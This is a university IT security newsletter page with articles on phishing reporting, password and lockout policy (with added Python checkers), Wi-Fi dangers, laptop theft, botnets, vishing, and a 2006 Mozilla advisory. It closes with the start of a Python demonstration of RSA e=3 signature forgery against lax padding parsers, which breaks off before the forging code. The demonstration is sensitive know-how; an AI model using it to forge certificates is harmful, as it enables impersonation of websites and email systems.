News & Alerts
Illegal Phishing and How to Report It
Password Construction Guidelines
Spear Phishing
Password Change Process
Wi-Fi: So Marvelous...and so Dangerous
Keeping Laptops from Getting Lost or Stolen
Attack of the Botnets
If We Could Only Go Back to the Good Ol' Days!
Mozilla Updates for Multiple Vulnerabilities
Apple QuickTime Vulnerabilities
CSIRT Draft Policy Available
Online Shopping: Tips to protect yourself from online scams
Illegal Phishing and How to Report It
By Lou Arminio
Phishing is the fraudulent process of attempting to acquire sensitive information such as
usernames, passwords, and credit card details by masquerading as a trustworthy entity in an
electronic communication. Phishing schemes can be used by attackers for a variety of things.
Here at NAU, attacks designed to gather user ids and passwords of accounts have been successfully
used to take over email accounts and use them to send spam. Having an account stolen as a result
of a successful phishing attack is very disruptive to the campus, as it usually results in all
campus email being blocked by major email providers such as Hotmail and Yahoo. It’s particularly
disruptive to the owner of the compromised account, as ITS must disable their access to prevent
continued abuse of the account and investigate the extent of the break-in. In order to help minimize
the impact of phishing attacks, it’s important for everyone to promptly and properly report
them to the appropriate authorities.
The first step is to identify the appropriate authority.
- If the message is spoofing an NAU department, report it to the NAU Solution Center or Student
Technology Services Help Desk.
- If the attack is spoofing an entity other than NAU, the attack should be reported to that agency.
The second step is to gather the appropriate information to be reported. Whether you are reporting a
phishing attack to NAU or another agency, the person receiving the report will need the original
message you received and the normally hidden email headers.
Outlook 2003/2008
While looking at the list of messages in your inbox, right-click on the phishing
message. There should be an entry labeled Message Options… (or simply Options… in
2003). Select this and a new window will open. At the bottom of the window will
be a text box containing the full email headers. Select and copy everything in the
text box and paste it into the email you are about to forward. Make sure the email
is addressed to the proper authority. Click Send.
Entourage
View the message. Then go to the Message -> Internet Headers menu item. This will
display all the headers. Select and copy the headers. Click your mouse in the forwarded
message where you want to insert the headers and paste them in. The shortcut key
to accomplish this is Command-Shift-H.
Mac Mail
View the message, then go to the View -> Message -> Long Headers menu item. The
headers will be exposed in the email. Click anywhere in the headers, and select
and copy them. Click your mouse in the forwarded message where you want to insert
the headers and paste them in. Repeat the View -> Message -> Long Headers action
to turn off showing full headers. The shortcut key to turn on and off exposure of
headers is Command-Shift-H.
Thunderbird
While viewing the message, go to the View -> Message Source menu item. This will
open a separate window with the entire message including headers and HTML formatting
exposed. Select and copy this text, open a new message, and paste everything in
as the body of the message.
Office Web Access (OWA)
Bring up OWA in Internet Explorer so that you get the full OWA version. Double-click
on the message in the inbox so the message opens in its own window. At the top of
the window will be several icons. One of them is the Message Details icon. It is
a picture of an open envelope with a sheet of paper superimposed over the right
side of the envelope. It’s just to the left of the Printer icon. Click the Message
Details icon, and a new window will open. At the bottom of the window will be a
text box containing the headers. Select, copy, and paste the headers into the email
with the forwarded phish message.
The final step is to forward the original email and the header information to the
appropriate agency.
- Report phishing attacks spoofing NAU to the Solution Center with the email address
ask-its@nau.edu, or the Student Technology Center Help
Desk at acad-help@nau.edu.
- If the attack is spoofing a company other than NAU, a commonly available email address
for this is the Abuse address. Many companies on the Internet have an Abuse account
for reports of misbehavior like phishing attempts. To send email to this account,
you must first identify the company’s Internet name. This should be the same as
the name of their main web site, without the “www” prefix. For example, the Arizona
State Credit Union’s web site is www.azstcu.org. Their abuse account is abuse@azstcu.org.
If you encounter difficulty following these instructions, or just feel you need
an extra helping hand, call the Solution Center at 3-1511 or Student Technology
Center Help Desk at 3-9294. Someone will be glad to assist you in working through
this process.
Password Construction Guidelines
By Harper Johnson
New password change enhancements were introduced in the fall of 2008. There has been some confusion
about the changes. Here, then, is a recap of the complexity rules that were put in place on the password
change application page.
Password Complexity Requirements
Passwords chosen must:
- be a minimum of seven (7) characters in length
- be a maximum of one hundred twenty-eight (128) characters in length
- contain at least one (1) character from three (3) of the following categories:
  - Uppercase letter (A-Z)
  - Lowercase letter (a-z)
  - Digit (0-9)
  - Special character `~!@#$%^&*()_+-={}|\:";'<>?,./
- not contain three or more consecutive characters from the user’s account name or display
name. If the account name is less than three characters long, then this check is not performed because the rate
at which passwords would be rejected would be too high. When a check is performed against the user’s full name,
several characters are treated as delimiters that separate the name into individual tokens: commas, periods,
dashes/hyphens, underscores, spaces, pound signs, and tabs. For each token that is three or more characters long,
that token is searched for in the password, and if it is present the password change is rejected.
For example, the name Erin M. Hagens would be split into three tokens: Erin, M, and Hagens. Because the second
token is only one character long it would be ignored. Therefore this user could not have a password that included
either "erin" or "hagens" as a substring anywhere in the password.
All of these checks are case insensitive.
Password Expiration
This setting determines the amount of time (in days) that a password can be used before the system requires the
user to change it. The value has been set at 42 days for faculty and staff, but it will be changed to 90 days for
all faculty, staff and students later this spring.
These changes will only help to protect your password to the extent that you do. Remember that it is against the
NAU Acceptable Use policy to share your password. If you follow the above guidelines and you protect your
password, you will be taking a big step toward protecting the university's and your own information.
Spear Phishing
By Harper Johnson
NAU email account holders continue to be targeted by fraudulent emails. These targeted emails,
known as spear phishing attacks, claim to be from the NAU.edu Web team or University Services and
request account holders to share their username and password with the sender. The recipients of
such messages are often threatened with deactivation of their email accounts if they don’t reply.
Some of the email messages are blatantly and obviously fraudulent, while others are more subtle
and convincing, but all have been very effective in harvesting Internet IDs and passwords. One
link has been known to take a user to a login page that is very similar in appearance to the NAU
login page. These messages are not from Northern Arizona University. NAU will NEVER ask you to
provide personal information, such as passwords or social security numbers, by email.
We recommend that if you receive an unsolicited email or you are unsure of the sender, you do not
reply, do not click any links contained within it, and do not open any attached files. Those
actions have been known to infect computers.
If you receive an email that claims to be from the University and asks for your Internet ID and
password, forward it, with all headers and the entire message, to
infosec@nau.edu. (Find instructions for expanding headers at
www.spamcop.net/fom-serve/cache/19.html.)
Fraudulent email claiming to be sent by outside agencies (PayPal, Wells Fargo or Arizona State Credit
Union, for example) should be reported directly to the company.
See www.onguardonline.gov/topics/phishing.aspx
for additional information and advice about these kinds of attacks.
Password Change Process
By Harper Johnson
It has been some time since a thorough review of password management at NAU was conducted. Recently,
concern was raised by a student in a campus information security course that the Academic Computing
Help Desk was not requiring stringent enough criteria for completing an over-the-phone password change.
Specifically, the student felt that much of the information being requested was readily available online.
We appreciated the student’s feedback and concern and organized a review of our current password change
policies and processes.
The review of password policy at NAU covered the following areas:
- Password requirements
  - What is allowed
  - What is not allowed
- Password management rules:
  - Password change cycle
  - Password aging
  - Password timeouts
- Password change mechanisms
  - In-person change request
  - Over-the-phone change request
  - On-line change request
The outcome of the review was the following recommendations, which will be implemented for faculty, staff, and students beginning November 3, 2008.
Password Complexity Requirements
Passwords chosen must:
- be a minimum of seven (7) characters in length
- be a maximum of one hundred twenty-eight (128) characters in length
- contain at least one (1) character from three (3) of the following categories:
  - Uppercase letter (A-Z)
  - Lowercase letter (a-z)
  - Digit (0-9)
  - Special character ` ~ ! @ # $ % ^ & * ( ) _ + - = { } | \ : " ; ' < > ? , . /
- not contain three or more consecutive characters from the user's account name or display name. If the account name is less than three characters long, then this check is not performed because the rate at which passwords would be rejected would be too high. When a check is performed against the user's full name, several characters are treated as delimiters that separate the name into individual tokens: commas, periods, dashes/hyphens, underscores, spaces, pound signs, and tabs. For each token that is three or more characters long, that token is searched for in the password, and if it is present the password change is rejected.
For example, the name Erin M. Hagens would be split into three tokens: Erin, M, and Hagens. Because the second token is only one character long it would be ignored. Therefore this user could not have a password that included either "erin" or "hagens" as a substring anywhere in the password. All of these checks are case insensitive.
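As an added example (not code from NAU's password change application), the following checker applies the complexity rules listed above and in the earlier Password Construction Guidelines article: length limits, three of four character categories, and the case-insensitive name check with the page's delimiters. It assumes the account name is searched for as a whole, and only when it is at least three characters long.

```python
# Added example (not NAU's own password change application): checks a candidate
# password against the complexity rules described in the newsletter.
MIN_LEN, MAX_LEN = 7, 128
SPECIALS = set('`~!@#$%^&*()_+-={}|\\:";\'<>?,./')   # special characters listed on the page
NAME_DELIMITERS = ",.-_ #\t"     # comma, period, dash, underscore, space, pound sign, tab
MIN_TOKEN_LEN = 3                # name tokens shorter than this are ignored


def category_count(password):
    """Count how many of the four character categories the password uses."""
    has_upper = any("A" <= c <= "Z" for c in password)
    has_lower = any("a" <= c <= "z" for c in password)
    has_digit = any("0" <= c <= "9" for c in password)
    has_special = any(c in SPECIALS for c in password)
    return sum([has_upper, has_lower, has_digit, has_special])


def name_tokens(display_name):
    """Split a display name on the page's delimiters and keep tokens of 3+ characters.

    "Erin M. Hagens" -> ["Erin", "Hagens"] (the one-letter "M" is dropped).
    """
    for delimiter in NAME_DELIMITERS:
        display_name = display_name.replace(delimiter, " ")
    return [t for t in display_name.split(" ") if len(t) >= MIN_TOKEN_LEN]


def check_password(password, account_name, display_name=""):
    """Return the list of rule violations; an empty list means the password is acceptable."""
    problems = []
    if len(password) < MIN_LEN:
        problems.append(f"shorter than {MIN_LEN} characters")
    if len(password) > MAX_LEN:
        problems.append(f"longer than {MAX_LEN} characters")
    cats = category_count(password)
    if cats < 3:
        problems.append(f"uses only {cats} of the 4 character categories (3 required)")
    lowered = password.lower()          # all name checks are case insensitive
    # Assumption: the account name is searched for as a whole, and only when it is
    # at least three characters long (the page skips the check for shorter names).
    if len(account_name) >= MIN_TOKEN_LEN and account_name.lower() in lowered:
        problems.append("contains the account name")
    for token in name_tokens(display_name):
        if token.lower() in lowered:
            problems.append(f'contains the name "{token}"')
    return problems


if __name__ == "__main__":
    # Constructed sample inputs; "ehagens" is a made-up account name for the page's example user.
    for candidate in ["Hagens#42", "erin", "Tr0ub4dor&"]:
        print(candidate, "->", check_password(candidate, "ehagens", "Erin M. Hagens") or "OK")
```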
Maximum Password Age
This setting determines the amount of time (in days) that a password can be used before the system requires the user to change it. The value has been set at 42 days for faculty and staff and will be set to 90 days for all faculty, staff and students.
Minimum Password Age
This setting determines the number of days that must pass before users can change their passwords. Defining a minimum password age prevents users from circumventing the password history policy by defining multiple passwords in rapid succession until they can use their old passwords again. The value for this setting is five minutes, which discourages rapid password recycling but permits users to eventually change their passwords.
Enforce Password History
This setting determines the number of unique new passwords that must be associated with a user account before an old password can be reused. It also rejects new passwords that are too similar to old passwords. This feature prevents users from circumventing password expiration restrictions by recycling old passwords or ones like them. The value will be set at four.
Account Lockout Threshold
This security setting determines the number of failed logon attempts that causes a user account to be locked out. A locked-out account cannot be used until it is reset by an administrator or until the lockout duration for the account has expired. This value will be set at six.
Account lockout duration
This security setting determines the number of minutes a locked-out account remains locked out before automatically becoming unlocked. The lockout duration will be set to thirty minutes, or until an administrator re-enables the user ID.
Reset account lockout counter after
This security setting determines the number of minutes that must elapse after a failed logon attempt before the failed logon attempt counter is reset to 0 bad logon attempts. If an account lockout threshold is defined, this reset time must be less than or equal to the Account lockout duration. This value should be set at two minutes.
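The three lockout settings interact, so here is an added model (not code from NAU's logon systems) that applies the threshold, duration and reset-counter values above to a sequence of logon attempts, with time in seconds; it assumes a successful logon clears the bad-logon counter, which the page does not state.

```python
# Added example (not NAU's own logon system): a model of the account lockout
# settings described above, with time expressed in seconds.
from dataclasses import dataclass
from typing import Dict, Optional

LOCKOUT_THRESHOLD = 6            # failed logons before the account locks
LOCKOUT_DURATION = 30 * 60       # seconds an account stays locked (thirty minutes)
RESET_COUNTER_AFTER = 2 * 60     # quiet seconds after which the bad-logon counter resets


@dataclass
class AccountState:
    bad_attempts: int = 0
    last_failure: Optional[float] = None   # time of the most recent failed logon
    locked_until: Optional[float] = None   # set while the account is locked out


class LockoutPolicy:
    def __init__(self, threshold=LOCKOUT_THRESHOLD, duration=LOCKOUT_DURATION,
                 reset_after=RESET_COUNTER_AFTER):
        # The page requires the reset time to be no larger than the lockout duration.
        if reset_after > duration:
            raise ValueError("reset counter time must be <= lockout duration")
        self.threshold, self.duration, self.reset_after = threshold, duration, reset_after
        self.accounts: Dict[str, AccountState] = {}

    def attempt(self, user, password_ok, now):
        """Process one logon at time `now`; returns "ok", "denied" or "locked"."""
        st = self.accounts.setdefault(user, AccountState())
        if st.locked_until is not None:
            if now < st.locked_until:
                return "locked"              # still inside the lockout duration
            st.locked_until = None           # duration expired: automatic unlock
            st.bad_attempts = 0
        # Reset the counter if the last failure is older than the reset window.
        if st.last_failure is not None and now - st.last_failure > self.reset_after:
            st.bad_attempts = 0
        if password_ok:
            # Assumption: a successful logon clears the counter (the page does not say).
            st.bad_attempts, st.last_failure = 0, None
            return "ok"
        st.bad_attempts += 1
        st.last_failure = now
        if st.bad_attempts >= self.threshold:
            st.locked_until = now + self.duration
            return "locked"
        return "denied"

    def admin_unlock(self, user):
        """An administrator re-enables the user ID before the duration expires."""
        self.accounts[user] = AccountState()


if __name__ == "__main__":
    policy = LockoutPolicy()
    print([policy.attempt("jdoe", False, t) for t in range(6)])   # sixth failure locks
    print(policy.attempt("jdoe", True, 10.0))                      # right password, still locked
    print(policy.attempt("jdoe", True, 5 + LOCKOUT_DURATION))      # unlocked after thirty minutes
```

Failures spaced more than two minutes apart never accumulate, which is the trade-off the reset-counter setting encodes.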
These rules will be implemented in November along with a revamped password change website. The password change site will incorporate the above rules along with increased functionality for verifying the user online.
These changes will only help to protect your password to the extent that you do. Remember that it is against the NAU Acceptable Use policy to share your password. If you follow the above guidelines and you protect your password, you will be taking a big step toward protecting the university’s and your own information.
Wi-Fi: So Marvelous...and so Dangerous
By Don Olson (with a Tip o’ the Hat to Gwen Ceylon and Harper Johnson)
Staying connected everywhere all the time—that’s what it’s about, isn’t it? To be sure, that’s
where we’re headed according to the common wisdom on the future of computing. Apple even introduced the thinnest laptop ever,
the MacBook Air, designed around the notion that everything, including installation of new applications, can occur via the airwaves.
Clearly, the future of computing is going to be wireless, freeing us to truly carry our lives, our work, and what has become
essentially our other brain, everywhere.
On the road to this ultimate Xanadu, however, we still have to make do with occasionally spotty network coverage, but at least
these days you can connect at your favorite coffee house, or at the airport, around a university, or in most corporate settings.
You might even surf on a stray network that’s available without password protection if the signal bleeds over to your location.
But just because you can does not mean you should. Lagging far behind the increasing availability of wireless networks and free
Internet hotspots is the dissemination of knowledge about what constitutes a safe connection. Even if you are sending email
or buying that killer guitar on eBay through a secure server, doing it over a free wireless connection may mean you are
broadcasting private information into the clear air. And that means that someone without your interests at
heart could be siphoning off that same data to enrich himself at your expense.
Consider the scenario: You open your laptop at an airport or at Buzz’s Buzz Barn coffee house and you’re asked if
you’d like to join the available network. Why not? It’s free, and you’ve got some time to kill. Pretty soon
you’re upping your bid on that kitschy clown painting on eBay, selling ten thousand shares of Google, and logging into your
email account. However, while you may think you are connected directly to the airport server or Buzz’s secure network, in fact
you have connected to their networks through another party’s computer, and that person is now recording every byte you send,
including your passwords, credit card information, brokerage account data, and your love poem to your significant other.
What has happened is a “man-in-the-middle” attack, also known as the “evil twin,” where you mistakenly
have connected to a WiFi hotspot which has been set up by an identity thief who is there to steal your personal information. He
makes his WiFi connection look like something legitimate for the area you’re in. And if he’s a particularly malevolent
sort, he may also be infecting your computer with some nasty viruses that you’ll unwittingly take back to the office or to
your home.
Or perhaps someone is simply running a packet sniffer to copy everything that flies between your laptop and the wireless access
point. This is pretty easy to do on an unsecured network, by the way. The tools to capture credit card numbers and passwords are
available for free through the Internet.
Although you should be cautious, it’s not something to lose sleep over. The dangers do indeed exist, but as with all
dangers in life, once you learn the avoidance and counter strategies you can put them out of your mind.
Learn what you need to protect yourself, even at the expense of losing that so wonderfully and totally
integrated-into-the-global-grid feeling. Security feels pretty good too. Here are some precautions to take.
- Use VPN—Virtual Private Network whenever possible. This provides a secure connection all the way from your laptop to
the server you’re using. You can learn all about it at www4.nau.edu/its/mensa/services/vpn. One caveat—set up your VPN
on a secure network before you use it in public. Setting it up at Buzz’s Buzz Barn is a bad idea.
- Even if you are using NAU’s VPN or another VPN, remember that once you leave the network—you open another browser
to connect to Yahoo!, for example—you may no longer be on a secure connection. If you’re not certain you’re
secure, then assume you’re not.
- Make sure that you’re actually connecting to the wireless router provided by the airport or business you’re expecting.
In an airport look for signs that give the network name. At a coffee house, ask what the name of their official network access point
is. Don’t simply pick one out of a list that comes up when you go to connect. Know what and where you’re connecting to.
- Turn off shared folders, files, and print sharing. Think of your data as cash in your pocket. Who would you want to have it?
- Look over your shoulder. Even if you’re using VPN on a legitimate WiFi connection, beware of your neighbors “shoulder
surfing” as you send and receive information. Although people do this simply out of boredom or proximity, this low-tech approach
is often quite successful for those with less-than-honorable intent. One single compromised password can get very, very costly.
- Keep your security software up to date. Hackers never take a day off!
- Never take a free ride on an unknown WiFi network just because it’s there and free. Consider the possibility that someone
has baited a trap for you by leaving his network open to your access. Don’t be the signal thief rat caught under the wire
trap bale when it snaps down, squeezing your passwords and credit card data out of you.
- If you use email via WiFi, consider forwarding your mail to a junk address that you use solely when connected wirelessly. This
way, if the junk account’s password is compromised, a malicious attacker still cannot get at your legitimate email account.
- If you are using Internet Explorer as your browser, turn off “Use Inline AutoComplete” under Internet Options
Advanced settings. This prevents your machine from caching, or storing, your userID and password.
- Never check any box offering to remember you by your computer or your username and password.
- Finally, be aware that even if operating through an encrypted channel, a technique known as “sidejacking” can be used
to capture your cookies from transactions on social networking sites. Sometimes cookies contain login information if the user has
asked the site to “remember” his login and password. So although it’s tedious, type it in new rather than
acquiescing to convenience, but only on a secure connection!
It really is going to be a big, wide, wonderful WiFi world someday, and there’s no reason to tread in fear. Just be aware
and be prepared.
Keeping Laptops from Getting Lost or Stolen
ITS Info Spring 2008-
New laptop computers are more powerful, have longer lasting batteries, are lighter in weight than their predecessors, and readily
take advantage of the wireless networking being installed all around the NAU campus. As such, we have seen an increase in laptop
use and several spurts of laptop theft.
Being ever more vigilant about cyber crime and identity theft, you’ve likely taken steps to secure the data on your laptop. You’ve
installed a firewall. You update your antivirus software. You protect your information with a strong password. You encrypt your data,
and you’re far too smart to fall for those emails that ask for your personal information. But what about the physical laptop itself? A
minor distraction is all it takes for your laptop to vanish. If it does, you may lose more than an expensive piece of hardware. The fact
is, if your data protections aren’t up to par, that sensitive and valuable information in your laptop may be a magnet for an identity
thief.
Chances are you’ve heard stories about stolen laptops on the news or from friends and colleagues. None of us thinks his or her own
laptop will be stolen—at least not until you find the trunk of your car pried open, notice that your laptop isn’t waiting at the other
side of airport security, or get a refill at the local java joint only to turn around and find only exposed tabletop where your laptop
once was.
OnGuardOnline, a website managed by the federal government that is devoted to computer security, protecting personal information,
and guarding against Internet fraud, suggests keeping these tips in mind when you take your laptop out and about:
Treat your laptop like cash. If you had a wad of money sitting on the table at the library, would you turn your back on it—even for
just a minute? Would you put it in checked luggage? Leave it on the backseat of your car? Of course not. Keep a careful eye on your
laptop just as you would a pile of cash.
Keep it locked. Whether you’re using your laptop in the office, a hotel, or some other public place, a security device can make it
more difficult for someone to steal it. Use a laptop security cable and attach it to something immovable or to a heavy piece of
furniture that’s difficult to move—say, a table or a desk.
Keep it off the floor. No matter where you are in public—at a conference, a coffee shop, or a registration desk—avoid putting your
laptop on the floor. If you must put it down, place it between your feet or at least up against your leg so that you’re aware of it.
Keep your passwords elsewhere. Remembering strong passwords or access numbers can be difficult. However, leaving either in a laptop
carrying case or on your laptop is like leaving the keys in your car. There’s no reason to make it easy for a thief to get to your
personal or corporate information.
Mind the bag. When you take your laptop on the road, carrying it in a computer case may advertise what’s inside. Consider using
a suitcase, a padded briefcase, a backpack, or even an ugly tote bag instead.
Get it out of the car. Don’t leave your laptop in the car—not on the seat, not in the trunk. Parked cars are a favorite target of
laptop thieves; don’t help them by leaving your laptop unattended. If you must leave your laptop behind, keep it out of sight.
Don’t leave it “for just a minute.” Your conference colleagues seem trustworthy, so you’re comfortable leaving your laptop while
you network during a break. The people at the coffee shop seem nice, so you ask them to keep an eye on it while you use the restroom.
Don’t leave your laptop unguarded—even for a minute. Take it with you if you can, or at least use a cable to secure it to something
heavy.
Pay strict attention in airports. Keep your eye on your laptop as you go through security. Hold onto it until the person in front
of you has gone through the metal detector—and keep an eye out when it emerges on the other side of the screener. The confusion and
shuffle of security checkpoints can be fertile ground for theft.
Be vigilant in hotels. If you stay in hotels, a security cable may not be enough. Try not to leave your laptop out in your room.
Rather, use the safe in your room if there is one. If you’re using a security cable to lock down your laptop, consider hanging the
“do not disturb” sign on your door.
Use bells and whistles. Depending on your security needs, an alarm can be a useful tool. Some laptop alarms sound when there’s
unexpected motion or when the computer moves outside a specified range around you. Or consider a kind of “lo-jack” for your laptop:
a program that reports the location of your stolen laptop once it’s connected to the Internet.
Where to turn for help. If your personal laptop is stolen, report it immediately to the local authorities. If it’s your university
laptop that’s missing, notify the local authorities and then immediately notify your supervisor. Then go to www.nau.edu/security, click
on “report an incident,” and complete the incident form.
If it’s your personal laptop and you fear that your information may be misused by an identity thief, visit www.ftc.gov/idtheft
for more information.
Attack of the Botnets
By Don Olson
May 11, 2007 -
In 1995, the authoritative and somber voiceover by actor
Sam Waterston was ominous: "You need to feel safe.
And that's harder to do nowadays, because robots may strike at any time."
Of course, this was only a fake television commercial
presented on Saturday Night Live for Old Glory
Insurance's policies offering protection to senior citizens
from robot attacks. It's still a funny bit to watch.
But now the robots really are attacking. Although they don't
threaten with their metal claws, they now attack by enlisting
legions of new allies--the zombie computers. This powerful rogue
army is rampaging across the globe, and even worse, you might be an
unwitting accomplice in the recruitment of the malevolent mass,
known as botnets. Imagine Night of the Living Dead
in cyberspace. We now face Attack of the Botnets.
"WARNING: Persons denying the existence of robots may be robots themselves."
Among the richest environments for botnet infiltration,
according to a New York Times article from January 6, 2007,
are university networks. With their high-speed Internet capabilities,
vast computing resources, large databases, and population of users that
includes students, faculty, and staff members who may not be aware of
the part they play in the creation of criminal botnet attack forces,
universities are a prime target for criminal elements. According to
Internet pioneer David J. Farber, quoted in the Times article,
"It represents a threat but it's one that is hard to explain…
the scope of the problem is still not clear to most people."
This is no longer idle vandalism by cut-and-paste script kiddies,
but serious illegal activity by professional criminals.
On our campus, computer users take advantage of the services offered
within the university and also from the greater Internet community:
e-mail, web surfing, music downloading, interactive gaming, Internet
chat sessions, picture sharing, blogging and countless other activities.
Therein lurks the danger. Because so many of these services cost nothing
and are easy to access, they mask the insidious threat that may creep
beneath the seductive user interface and friendly banter. By clicking
that attachment to an email with subject line "Sign Up for Sweepstakes!!!!"
you could be enabling code that might turn your laptop into a zombie under
the control of robot masters unknown to you.
Large collections of such pirated systems can be commanded remotely to
send out spam mailings or to search files for financial or security data.
With 650 million computers now connected to the Internet worldwide,
the opportunities are attractive to cyber criminals.
Botnets are made up of programs running on many machines cooperatively
under the control of a central automated authority, which in turn is
controlled by a determined human somewhere in the world.
And with criminals willing to pay money for access to restricted information
or to send out millions of emails offering fake prizes to lure in yet more
unknowing users, there is a lot of profit for the controllers of botnets.
To give an idea of the extent of this capability, one botnet ring broken
up in the Netherlands in late 2005 had commandeered a network of 1.5
million computers. Given the multiplicative power of nodes
linked together, this is an astounding figure. And remember, the vast
majority of the owners of these machines had no idea that their resources
were being used for illegal activity. It is estimated that 80 to 90
percent of all spam --that e-mail we all love so dearly-- is sent by
such zombie networks.
Despite the robust security measures taken at institutions like
NAU, in order to
keep the Internet open and useful some of the responsibility has to be
borne by the end users themselves by applying a few common sense security rules:
- Never, ever share your passwords or account information.
- Always use combinations of upper- and lower-case letters, numbers,
and special characters in passwords to defeat brute force
dictionary-based cracking schemes.
- Don't use the same password on every account.
- Don't permit your web browser to store your passwords for you.
- Never send your password in a session that you did not initiate--that
is, don't respond to requests for passwords if you have not sought out
the requesting site for your own purposes. Be sure you know the entity
requiring it.
- Never respond to an email request for your passwords. No responsible
outfit ever solicits your password or account information with an
out-of-the-blue email. Don't believe subject lines like
"Your account is overdrawn," or "In response to your request."
- Never click on attachments in e-mails from sources unknown to you.
- Whenever spam e-mails offer a killer deal on some item or service,
the odds strongly favor that a rip-off is in progress.
Never respond to these come-ons. If it seems like an unbelievable deal,
it's most likely because it's false.
- Use a firewall program that alerts you to unexpected use of outgoing
connections on your computer.
- Never leave your computer unattended when you are logged into any of
your private accounts.
- Regularly run anti-virus software to check for worms, Trojan horses,
and viruses on your computer.
- Report any suspected hostile attack to Information Technology Services.
The response to these concerted attacks on innocent institutions and users
requires a dual-edged counter by the service providers and
their customers. Security is everybody's business.
"So, don't cower under your afghan any longer. Make a choice. Old Glory Insurance.
For when the metal ones decide to come for you--and they will."
Prophetic words indeed, Mr. Waterston.
If We Could Only Go Back to the Good Ol' Days!
By Harper Johnson
February 2, 2007 -
Apparently, you can't go back into the past,
but you can certainly borrow from the past.
We see it every day: clothes from the seventies,
the T-bird from Ford, even talk of a Police reunion tour.
With each instance, we see that there has been a slight
update to the original, and yet still enough of the
original remains intact to invoke images of a kinder,
gentler, past which time and nostalgia have placed in our memories.
Well, wake up! Will Rogers once said,
"Things ain't what they used to be and probably never was."
One thing that has been reincarnated from that
"kinder, gentler past" is the phone scam.
With the aid of computer technology, it too has been
given a slight update from the original and is now referred to as vishing.
Vishing, a combination of "voice" and "phishing," is one more approach
to stealing your personal identity or financial data. As waves of web
and e-mail scams have bombarded us, we have slowly traded the dangers
of the past for the dangers of today. And as we have adapted and become
more careful to avoid the computer scam of the day, the criminal element
has adapted by bringing back a thing of comfort from the past, the
telephone transaction. Yet this time they are using Voice over Internet
Protocol, or VoIP, to hide their trail: VoIP numbers are cheap to obtain
and discard, and the caller ID they present can be set to anything.
In vishing, instead of receiving an e-mail claiming that your account
has been compromised, you receive the same message as a call or recorded
message placed through a VoIP system.
The message might claim that your credit card has been illegally
used or that there has been unusual activity on the account.
It then requests you to call the number in the message immediately
to protect your credit.
If you call the number, you will get an automated system which asks
you to enter your account information for verification.
Once you have entered your account number the system may disconnect
or it may request that you continue to press keys for additional
information. Once you have divulged that information your account
has truly been compromised. This entire process can be automated
with call control programs that can work tirelessly through a
collection of numbers or a specific geographic area, and it only
takes a tiny response rate to make it profitable.
Phone scams were here long before the computer arrived on the scene.
Treat these calls just as you would any "phishy" e-mail or web-scam.
Don't reply to the request, and contact your financial institution
using only the methods you have already established.
As George Wildman Ball said, "Nostalgia is a seductive liar."
So remember the past and protect your future.
Mozilla Updates for Multiple Vulnerabilities
By Harper Johnson
November 8, 2006 -
Please share this information. Note that this can
have an impact on Mac and Windows users.
National Cyber Alert System
Technical Cyber Security Alert TA06-312A
- Mozilla Updates for Multiple Vulnerabilities
- Original release date: November 8, 2006
Last revised: --
Source: US-CERT
- Systems Affected
- Mozilla SeaMonkey
- Mozilla Firefox
- Mozilla Thunderbird
- Netscape web browser
- Overview
- The Mozilla web browser and derived products contain several
vulnerabilities, the most serious of which could allow a remote
attacker to execute arbitrary code on an affected system.
- I. Description
Several vulnerabilities have been reported in the Mozilla web browser
and derived products. Mozilla has released three security advisories
to describe the vulnerabilities:
Mozilla Foundation Security Advisory 2006-67 addresses a remote
code execution vulnerability in the way JavaScript is handled by
Firefox, Thunderbird, and SeaMonkey. More information can be found
in VU#714496.
Mozilla Foundation Security Advisory 2006-66 addresses a
vulnerability in the way RSA signatures are handled by Firefox,
Thunderbird, and SeaMonkey. More information can be found in
VU#335392.
Mozilla Foundation Security Advisory 2006-65 addresses three memory
corruption vulnerabilities in Firefox, Thunderbird, and SeaMonkey.
More information can be found in VU#815432, VU#390480, and
VU#495288.
Any products based on Mozilla components, specifically Gecko, may also
be affected by VU#714496, VU#815432, VU#390480, and VU#495288.
Any software that uses the Mozilla Network Security Services (NSS)
library may be affected by VU#335392.
- II. Impact
The most severe of these vulnerabilities could allow a remote,
unauthenticated attacker to execute arbitrary code with the privileges
of the user running the affected application. Other effects include
forging an RSA signature and denial of service.
Forging an RSA signature (VU#335392) may allow an attacker to craft a
TLS/SSL or email certificate that will not be detected as invalid.
This may allow that attacker to impersonate a website or email system
that relies on certificates for authentication.
- III. Solution
Upgrade
These vulnerabilities are addressed in Mozilla Firefox 1.5.0.8,
Mozilla Thunderbird 1.5.0.8, and SeaMonkey 1.0.6.
According to Mozilla:
Firefox 1.5.0.x will be maintained with security and stability
updates until April 24, 2007. All users are strongly encouraged to
upgrade to Firefox 2.
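The Impact section above says a forged RSA signature can yield a certificate that is not detected as invalid, but not how a verifier gets fooled. The mechanism behind the 2006 RSA signature-forgery fixes in NSS and other libraries was lax parsing of PKCS#1 v1.5 signature padding combined with the public exponent e = 3 (Bleichenbacher's 2006 attack). The Python below is an added illustration written for this page, not code from the advisory, Mozilla or NSS: lax_check is a generic stand-in for a parser that stops checking once it has matched the hash (not the actual NSS code path), strict_check is the fix (rebuild the single valid encoding and compare every byte), and forge_e3 produces a "signature" the lax parser accepts for any message without knowing the private key. The modulus N is a constructed 2048-bit placeholder, SHA-1 DigestInfo is assumed, and the message is a constructed stand-in for the to-be-signed bytes of a certificate.

```python
"""PKCS#1 v1.5 signature-padding forgery with public exponent e = 3.
Added illustration for this page; not advisory, Mozilla or NSS code."""
import hashlib

E = 3
# DER prefix of DigestInfo for SHA-1:
# SEQUENCE { SEQUENCE { OID 1.3.14.3.2.26, NULL }, OCTET STRING (20 bytes) }
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")
# Placeholder 2048-bit public modulus (constructed: top bit set, odd). The forgery
# needs only its size; nothing is ever reduced mod n because the cube stays below n.
N = (1 << 2047) | 0x1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F


def digest_info(msg: bytes) -> bytes:
    return SHA1_DIGESTINFO + hashlib.sha1(msg).digest()


def emsa_pkcs1_v15(msg: bytes, k: int) -> bytes:
    """The single correct k-byte encoding: 00 01 FF..FF 00 || DigestInfo."""
    t = digest_info(msg)
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def recover(sig: int, n: int) -> bytes:
    """RSA verification primitive: sig^e mod n as a k-byte big-endian block."""
    k = (n.bit_length() + 7) // 8
    return pow(sig, E, n).to_bytes(k, "big")


def lax_check(em: bytes, msg: bytes) -> bool:
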